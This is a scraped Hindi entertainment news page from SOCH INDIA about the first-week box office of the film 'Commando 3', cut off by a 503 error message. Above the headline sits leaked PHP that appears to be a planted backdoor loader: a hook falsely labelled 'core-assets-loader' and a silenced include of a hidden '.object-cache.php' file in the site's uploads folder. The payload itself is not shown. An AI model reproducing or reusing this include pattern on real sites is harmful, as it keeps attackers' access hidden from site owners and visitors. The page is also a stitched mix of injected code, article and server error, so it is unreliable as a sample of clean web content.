add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); शानदार रहा ‘कमांडो’ का पहला हफ्ता, बटोर लिए इतने करोड़ – SOCH INDIA
Menu

मनोरंजन
शानदार रहा ‘कमांडो’ का पहला हफ्ता, बटोर लिए इतने करोड़

nobanner

बॉलीवुड एक्टर विद्युत जामवाल (Vidyut Jammwal) की फिल्म ‘कमांडो 3 (Commando 3)’ को रिलीज हुए कुल एक हफ्ते बीत चुके हैं. 29 नवंबर को यह फिल्म सिनेमाघरों में रिलीज हुई थी. बता दें, पूरे भारत में यह फिल्म 2,541 स्क्रीन पर रिलीज की गई है. बॉलीवुड के एक्शन एडिक्ट्स के बीच फिल्म को काफी सराहना मिल रही है. आदित्य दत्त द्वारा निर्देशित इस फिल्म में विद्युत जामवाल के अलावा गुलशन देवैया, अदा शर्मा, अंगीरा धर, राजेश तैलंग और सुमीत ठाकुर मुख्य भूमिकाओं में हैं. बॉक्स ऑफिस पर इस फिल्म ने अपने पहले हफ्ते में अच्छी कमाई की है.

एक्शन से भरपूर ‘कमांडो’ फ्रेंचाइजी का तीसरा भाग ‘कमांडो 3’ का निर्माण विपुल अमृतलाल शाह और रिलांयस एंटरटेनमेंट द्वारा किया गया है. इस फिल्म का लोगों को बड़ी बेसब्री से इंतजार था. अब इस फिल्म का पहले हफ्ते का बॉक्स ऑफिस कलेक्शन भी समाने आ चुका है, जिसे देखकर यह कहा जा सकता है कि फिल्म लोगों को पसंद आई है. बॉक्स ऑफिस इंडिया के अनुसार पहले हफ्ते इस फिल्म के हाथ लगभग 29.15 करोड़ रुपये लगे हैं.

पहली फिल्म में विद्युत का किरदार जहां प्यार के लिए लड़ता है, वहीं दूसरी फिल्म में देश के पैसे को ब्लैक मनी में बदल रहे लोगों का पकड़ता है और अब उनका किरदार कैप्टेन करणवीर सिंह डोगरा देश को आतंकवादी खतरे से बचाते दिख रहा है. सन शाइन पिक्च र्स के सहयोग से रिलायंस एंटरटेनमेंट और मोशन पिक्चर कैपिटल द्वारा प्रस्तुत, ‘कमांडो 3’ एक विपुल अमृतलाल शाह प्रोडक्शन की फिल्म है.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.